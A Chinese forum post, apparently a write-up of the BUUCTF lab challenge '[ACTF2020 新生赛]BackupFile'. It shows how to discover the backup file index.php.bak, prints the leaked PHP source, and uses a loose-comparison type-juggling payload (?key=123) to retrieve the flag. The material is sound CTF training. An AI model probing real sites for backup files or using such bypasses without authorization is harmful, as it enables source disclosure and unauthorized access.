登录后更精彩...O(∩_∩)O...
您需要 登录 才可以下载或查看,没有账号?立即注册
×
BUUCTF靶场18 -- [ACTF2020 新生赛]BackupFile
打开目标网站后,发现提示尝试发现源码,结合题目backupfile,这道题应该需要发现网站的备份文件,通常备份文件一般是,index.php.bak、www.zip、/.bak等。这道题的备份为index.php.bak。
dirsearch发现
[Plain Text] 纯文本查看 复制代码 [21:16:01] 200 - 9B - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[PHP] 纯文本查看 复制代码 <?php
include_once "flag.php";
if(isset($_GET['key'])) {
$key = $_GET['key'];
if(!is_numeric($key)) {
exit("Just num!");
}
$key = intval($key);
$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
if($key == $str) {
echo $flag;
}
}
else {
echo "Try to find out source file!";
}
Payload:
[PHP] 纯文本查看 复制代码 http://f5a959f9-c716-4283-a0e2-091b1f9b244b.node4.buuoj.cn:81/index.php?key=123
flag{34854642-4391-4f08-a75c-1fee7ad4ad2b}
| 
发表于 2022-9-2 21:27:40
